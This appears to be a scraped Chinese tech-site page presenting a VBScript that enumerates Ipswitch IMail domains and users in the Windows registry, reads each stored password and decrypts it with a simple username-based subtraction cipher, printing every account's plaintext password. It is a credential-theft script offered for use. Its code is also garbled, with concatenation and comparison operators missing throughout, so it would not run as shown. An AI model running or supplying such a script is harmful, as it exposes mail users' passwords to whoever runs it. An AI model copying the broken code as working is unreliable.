主頁(yè) > 知識(shí)庫(kù) > vbs imail 密碼解密

vbs imail 密碼解密

熱門標(biāo)簽:智能手機(jī) 鐵路電話系統(tǒng) 呼叫中心市場(chǎng)需求 檢查注冊(cè)表項(xiàng) 美圖手機(jī) 網(wǎng)站文章發(fā)布 服務(wù)器配置 銀行業(yè)務(wù)
復(fù)制代碼 代碼如下:

on error resume next
const HKEY_LOCAL_MACHINE = H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
strComputer "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Ipswitch\IMail\Domains"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath, arrSubKeys
For Each subkey In arrSubKeys
wscript.echo "Domain: "subkey
strKeyPath2 = strKeyPath"\"subkey"\Users"
oReg.EnumKey HKEY_LOCAL_MACHINE, strKeyPath2, arrSubKeys2
For Each subkey2 In arrSubKeys2
strKeyPath3=strKeyPath2"\"subkey2
strValueName = "Password"
oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath3,strValueName,strValue
if len(subkey2) and len(strValue) then
wscript.echo subkey2 " : " decrypt(subkey2,strValue)
end if
Next
Next

function decrypt(name,pass)
while len(name)len(pass)/2
name=namename
wend
for i=0 to len(pass)/2-1
p=mid(pass,2*i+1,2)
p="H"p
n=mid(name,i+1,1)
decrypt=decryptchr(clng(p)-asc(n))
next
end function

標(biāo)簽:紅河 上海 滄州 河南 長(zhǎng)治 新疆 樂(lè)山 沈陽(yáng)

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《vbs imail 密碼解密》,本文關(guān)鍵詞  ;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 收縮
    • 微信客服
    • 微信二維碼
    • 電話咨詢

    • 400-1100-266